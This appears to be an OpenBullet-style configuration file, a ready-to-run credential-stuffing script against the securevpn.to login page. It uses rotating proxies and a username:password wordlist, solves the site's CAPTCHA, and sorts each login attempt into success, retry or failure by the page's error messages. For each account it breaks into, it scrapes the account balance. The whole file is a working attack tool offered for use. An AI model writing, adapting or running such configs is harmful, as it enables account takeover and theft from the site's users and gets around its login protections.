[SETTINGS]
{
  "Name": "SecureVPN",
  "SuggestedBots": 15,
  "LastModified": "2018-05-23T00:23:18.3803226+00:00",
  "AdditionalInfo": "",
  "Author": "MaStErChO",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://www.securevpn.to/index.php?page=login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
CAPTCHA "https://www.securevpn.to/plugins/securimage/securimage_show.php" Base64=FALSE SendScreenshot=FALSE -> VAR "CAPTCHA" 
REQUEST POST "https://www.securevpn.to/index.php?page=login" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>&captcha=<CAPTCHA>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent:  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Success AND 
    KEY "<SOURCE>" DoesNotContain "The CAPTCHA was incorrect" 
    KEY "<SOURCE>" DoesNotContain "The password was incorrect" 
    KEY "<SOURCE>" DoesNotContain "The username does not exist" 
  KEYCHAIN Retry OR 
    KEY "The CAPTCHA was incorrect" 
    KEY "Some required fields were empty" 
  KEYCHAIN Failure OR 
    KEY "The password was incorrect" 
    KEY "The username does not exist" 
    KEY "The username is not allowed" 
REQUEST GET "https://www.securevpn.to/index.php" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.64" 
  HEADER "Pragma: no-cache" 
#Balance PARSE "<SOURCE>" LR "Balance:</b>" "</div>" Recursive=FALSE -> CAP "Balance" "" "" 
